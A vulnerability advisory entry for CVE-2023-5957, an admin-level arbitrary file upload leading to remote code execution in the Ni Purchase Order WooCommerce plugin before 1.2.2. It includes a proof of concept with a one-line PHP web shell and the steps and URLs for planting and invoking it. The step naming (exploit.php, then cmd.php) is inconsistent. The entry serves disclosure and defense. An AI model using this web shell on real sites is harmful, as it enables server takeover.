Ni Purchase Order(PO) For WooCommerce < 1.2.2 – Admin+ File Upload to Remote Code Execution | CVE 2023-5957 | Plugin Vulnerabilities

Description

The plugin does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell.

Proof of Concept

1. Create a malicious file `exploit.php` with the contents `<?php echo system($_GET['cmd']); ?>` 
2. Visit https://example.com/wordpress/wp-admin/admin.php?page=niwoopo-setting
3. Select the `cmd.php` file in the Logo or Signature section and save the settings. The file will be accessible at https://example.com/wordpress/wp-content/uploads/ni-purchase-order/cmd.php?cmd=ls and it will show a directory listing

Affects Plugins

ni-purchase-orderpo-for-woocommerce

Fixed in 1.2.2

References

CVE

YouTube Video

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Dao Xuan Hieu

Submitter

Dao Xuan Hieu

Verified

Yes

WPVDB ID

70f823ff-64ad-4f05-9eb3-b69b3b79dc12

Timeline

Publicly Published

2023-09-26 (about 2 years ago)

Added

2023-12-12 (about 2 years ago)

Last Updated

2024-03-21 (about 1 year ago)

Other

Published

Title

Published

2021-06-07

Title

WordPress Popular Posts < 5.3.3 - Authenticated Code Injection

Published

2014-08-01

Title

WP-Super-Cache 1.3 - Remote Code Execution

Published

2022-02-03

Title

Ad Inserter < 2.7.11 - Admin+ RCE / Stored XSS

Published

2024-12-20

Title

kk Star Ratings – Rate Post & Collect User Feedbacks < 5.4.10.2 - Unauthenticated Arbitrary Shortcode Execution

Published

2025-02-07

Title

WP All Export Pro < 1.9.2 - Unauthenticated Remote Code Execution via Custom Export Fields